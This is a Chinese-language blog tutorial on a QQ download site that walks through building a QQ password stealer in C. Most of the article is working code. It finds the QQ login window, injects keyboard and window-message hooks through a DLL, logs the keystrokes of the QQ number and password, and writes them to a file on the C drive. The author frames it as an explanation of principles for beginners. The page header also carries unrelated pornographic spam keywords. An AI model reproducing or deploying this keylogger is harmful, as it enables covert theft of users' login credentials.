五月天综合网站日本|亚洲欧美人与动人物在线|久久1024国产对白精品|原创国产中文AV

      1. <bdo id="jr9fn"></bdo>

        <span id="jr9fn"></span>

        專業(yè)的QQ下載站 本站非騰訊QQ官方網(wǎng)站

        QQ下載|QQ資訊|QQ分類|下載排行|最近更新

        當前位置:首頁騰訊技術(shù)QQ電腦秘籍 → QQ用戶小心了! C語言實現(xiàn)QQ密碼大盜

        QQ用戶小心了! C語言實現(xiàn)QQ密碼大盜

        時間:2006/3/14 17:49:00人氣:0作者:佚名我要評論(0)
        一般的盜密碼的軟件的軟件都是通過監(jiān)視鍵盤來獲得密碼,這樣操作比較方便,但是這樣也存在一定問題,密碼有的時候不是很準確,因為有的人輸入密碼并不是從前到后輸入,當然這樣的人也是少數(shù),盜密碼嘛,當然去得到那些比較粗心的人的密碼! 通過安裝鉤子來監(jiān)視QQ登陸界面就是獲得密碼的方法,在安裝前得先找到登陸窗口的句柄,當鉤子安裝后,記錄鍵盤,當用戶“回車”或是點了“登陸”就可以開始處理密碼了! 我準備分為四部分來說明這個整個過程:

         。1)尋找QQ登陸界面。

         。2)安裝鉤子

         。3)鉤子函數(shù)的解釋.

          (4)處理密碼。

          以下部分全是使用C語言,文章中我假設讀者您是會C/SDK編程的。如果遇到相關(guān)的概念性問題,您可以查看MSDN或是上BBS 詢問!

          尋找QQ登陸界面

          軟件運行后,利用安裝定時器,每秒在系統(tǒng)找QQ登陸界面,這樣基本上只要用戶打開了QQ登陸界面就會被抓住其句柄,看下面代碼:

        #define ID_MYTIMER 555
        SetTimer(hDlg, ID_MYTIMER, 1000, NULL);

          安裝好TIMER后,下面是處理主程序的WM_TIMER消息,凡是出現(xiàn)沒有定義的變量,您可以理解為是全局變量.

        //處理WM_TIMER代碼

        if (!IsWindow(g_hQQLogin)) //判斷g_hQQLogin是否是有效的窗口句柄
        {
         HWND hLogin=NULL;
         g_hQQLogin = NULL;
         SetQQHook(NULL); //參數(shù)為NULL是卸載HOOK,參數(shù)為句柄是安裝句柄
         do
         {
          //利用FindWindowEx查找QQ登陸窗口,具體參數(shù)意思請查MSDN
          g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //對話框的類都是#32770
          //找到類名是#32770后,再在其窗體內(nèi)找一個具有“ 登錄QQ”的BUTTON按紐
          hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登錄QQ"); //這一句很關(guān)鍵,如果你的QQ登陸窗口上沒有" 登錄QQ"字樣,那么獲取密碼將失!
         }

         while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口,即:QQ登陸窗口
          if (g_hQQLogin != NULL)
          {
           SetQQHook(g_hQQLogin);//安裝HOOK,此函數(shù)在DLL文件中 第二部分中介紹
          }
         }

          上面就是查找QQ登陸窗口句柄的過程,從代碼可以看出我用的方法:找一個其子窗體中有一個標題為“ 登錄QQ”的BUTTON的對話框(這句話說得有點饒口,這句話如果也看不懂,下面您不用看了:() 我最開始是想利用 FindWindow(NULL,"QQ用戶登陸窗口")來查找,但是我用Spy++看了QQ登陸窗口的標題并不是“QQ用戶登陸窗口”,而是“亂碼”,其中包含了回車鍵等特殊字符,于是我用了FindWindowEx().

          安裝鉤子

          找到了QQ登陸窗口后,就成功了一半。

          下面是DLL文件中的安裝HOOK的函數(shù)SetQQHook(), 為什么要用DLL(動態(tài)連接庫)?要去“鉤”其他進程的消息,得讓HOOK函數(shù)在DLL中,這樣好映射到其地址空間中!

        BOOL WINAPI SetQQHook(HWND hQQLogin)
        {
         //獲得登陸框的句柄

         BOOL bRet = FALSE;
         if (hQQLogin != NULL)
         {
          DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //這是什么意思?看MSDN
          g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ,此處不一樣! 得到QQ號的子窗口句柄
          g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ,此處不一樣!得到QQ密碼的子窗口句柄
          if (g_hNum == NULL)
          {
           MessageBox(NULL,"哭了,號碼句柄都沒有得到!","郁悶",0);
           return FALSE;
          }
          if(g_hPsw==NULL)
          {
           MessageBox(NULL,"哭了,密碼句柄都沒有得到!","郁悶",0);
           return FALSE;
          }
         

          分別鍵盤HOOK,和界面部分消息處理的HOOK

        g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
        g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
        bRet = (g_hProc != NULL) && (g_hKey != NULL);
        }
        else
        {
         // 卸載鉤子

         bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
         g_hProc = NULL;
         g_hKey = NULL;
         g_hNum = NULL;
        }
        return bRet;
        }

         

          上面是安裝HOOK部分的代碼,就這么簡單,上面提到了CallWndProc,KeyboardProc是兩個回調(diào)函數(shù),是我第三部分要解釋的鉤子函數(shù)
        鉤子函數(shù)的解釋

          CallWndProc,KeyboardProc是兩個回調(diào)函數(shù)的原型和具體代碼如下:

        // 鉤子過程,監(jiān)視“登陸”的命令消息

        LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
        {
         CWPSTRUCT *p = (CWPSTRUCT *)lParam;

         // 捕獲“登陸”按鈕

         if (p->message == WM_COMMAND && p->wParam ==16032)
          //下面?zhèn)函數(shù)是我在第四部分介紹-“處理密碼”部分會仔細說明
          //當用戶點了登陸按鈕,說明QQ號碼和QQ密碼已經(jīng)填寫完畢,當然可以去獲得密碼了

          GetPasswrod();
          return CallNextHookEx(g_hProc, nCode, wParam, lParam);
        }

        // 鍵盤鉤子過程,監(jiān)視“登陸”的熱鍵消息

        LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
        {
         // 捕獲熱鍵消息,記錄鍵盤的按鍵盤過程,pmsg是PMSG類型的,i是全局Static類型的
         pmsg[i].wParam =wParam;
         i++;
         if (wParam == VK_RETURN) //用戶使用鍵盤“回車”來登陸,用戶用了回車后,就可以可以去獲得密碼了
          GetPasswrod();
          return CallNextHookEx(g_hKey, nCode, wParam, lParam);
        }
         

          在明白了這兩個鉤子函數(shù)后就可以看后期是如何具體處理密碼的了,這就是下面的第四部分內(nèi)容

          處理密碼

          如果您讀到了此處,我想得暫停一會,先讓我來幫你回憶一下前面提到的幾個關(guān)鍵的變量

          第一個:QQ號的子窗口句柄 g_hNum

          第二個:QQ密碼的子窗口句柄 g_hPsw //此部分暫時不使用,下面

          第三個:存鍵盤按鍵的 pmsg

          上面三變量分別出現(xiàn)在第二部分和第三部分,都是全局共享(shared)變量

          QQ密碼的子窗口句柄 g_hPsw 此部分暫時不使用,你可以看到下面代碼中有句用到g_hPsw的語句是我注釋掉了的,原因是無法通過那樣去得到QQ密碼,得處理按鍵消息

        void GetPasswrod()
        {
         //聲明變量和初始化

         HANDLE f;
         TCHAR num[13];
         TCHAR psw[21];
         TCHAR total[50];
         int j;
         memset(num,0,sizeof(num));
         memset(total,0,sizeof(total));
         memset(psw,0,sizeof(psw));
         DWORD dw;
         //得到QQ號的內(nèi)容,以為有的人的QQ號是在登陸框有記錄,其QQ號并是用鍵盤輸入的
         GetWindowText(g_hNum,(LPSTR)num,sizeof(num));
         //GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用,無法這樣獲得密碼
         //提取出鍵盤記錄,此內(nèi)容也許全是密碼,也許是QQ號+QQ密碼
         for(j=0;j<20;j++)
         {
          psw[j]=(TCHAR)pmsg[j*2].wParam ;
         }
         psw[j+1]=’\0’;

         //把QQ號碼和QQ密碼寫入C盤password.txt中

        f=CreateFile("c:\\password.txt",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

         strcat(total,"號碼");
         strcat(total,num);
         strcat(total,"密碼:");
         strcat(total,psw);
         WriteFile(f,&total,sizeof(total),&dw,NULL);
         CloseHandle(f);
        }

          最后在C盤password.txt也許會出現(xiàn)這樣兩種情況:

          1)當QQ號是沒有用輸入,而已用的粘貼或者是電腦以前有記錄則是:號碼:21728812密碼:TEST

          2) 當QQ號是用的鍵盤輸入,電腦沒有QQ號記錄時則是: 號碼:21728812密碼:21728812TEST

          可以看出,第2種情況把QQ當成了密碼了,所以密碼還得減去QQ號,

          特別說明:我這樣直接處理wParam參數(shù),得到的字符密碼全是大寫的,具體大小寫問題我沒有就沒有仔細去處理的,功能實現(xiàn)就行了,畢竟我使用他不用來盜密碼的!

          上面四部分基本上獲得密碼的功能介紹完畢。凡是沒有介紹的變量皆是全局變量,沒有提到的函數(shù)如:GetWindowThreadProcessId(),SetWindowsHookEx(),UnhookWindowsHookEx(),CallNextHookEx(),CreateFile(),WriteFile()等皆是Windows API,詳細使用說明請查MSDN(http://www.msdn.com),我提到的“HOOK”,“鉤子”是同一個意思,也許有的地方我說的鉤子函數(shù),而另外一個地方說的是HOOK函數(shù)

          特別說明:上面有具體的運行文件,由于小弟并沒有考慮到更多細節(jié),我只是用了“理想”狀況下去獲得密碼,并且或的密碼后并沒有注重后期密碼處理,也許出現(xiàn)密碼大小寫不符合或是無法得到密碼,請大家千萬別笑話,我寫這篇菜鳥級別的Blog的原因意在告訴一些對這方面感到疑惑的朋友基本的原理,和希望和大俠們交流 !

        猜你喜歡

        網(wǎng)友評論

        請自覺遵守互聯(lián)網(wǎng)相關(guān)政策法規(guī),評論內(nèi)容只代表網(wǎng)友觀點,與本站立場無關(guān)!

        熱門評論

        最新評論

        已有0人參與,點擊查看更多精彩評論

        關(guān)于騰牛 | 聯(lián)系方式 | 發(fā)展歷程 | 版權(quán)聲明 | 下載幫助(?) | 廣告聯(lián)系 | 網(wǎng)站地圖 | 友情鏈接

        Copyright 2005-2018 QQTN.com 【騰牛網(wǎng)】 版權(quán)所有 鄂ICP備17010784號-1 | 鄂公網(wǎng)安備 42011102000245號

        聲明: 本站非騰訊QQ官方網(wǎng)站 所有軟件和文章來自互聯(lián)網(wǎng) 如有異議 請與本站聯(lián)系 本站為非贏利性網(wǎng)站 不接受任何贊助和廣告